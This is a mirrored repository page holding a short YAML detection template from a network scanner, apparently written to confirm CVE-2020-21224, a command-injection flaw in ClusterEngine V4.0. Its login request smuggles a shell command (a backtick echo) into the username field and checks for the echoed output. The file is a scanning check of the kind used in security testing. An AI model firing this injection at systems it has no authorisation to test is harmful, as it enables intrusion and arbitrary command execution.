mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-13 21:02:44 +08:00
15 lines
507 B
YAML
15 lines
507 B
YAML
name: poc-yaml-clusterEngine-rce-cve-2020-21224
|
|
rules:
|
|
- method: POST
|
|
path: /login
|
|
headers:
|
|
User-Agent: >-
|
|
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
|
|
like Gecko) Chrome/87.0.4280.88 Safari/537.36
|
|
body: op=login&username=;`echo 12345678987654321`&password=
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status==200 && response.body.bcontains(b'12345678987654321')
|
|
detail:
|
|
author: jdr
|
|
info: CVE-2020-21224(ClusterEngineV4.0 RCE) |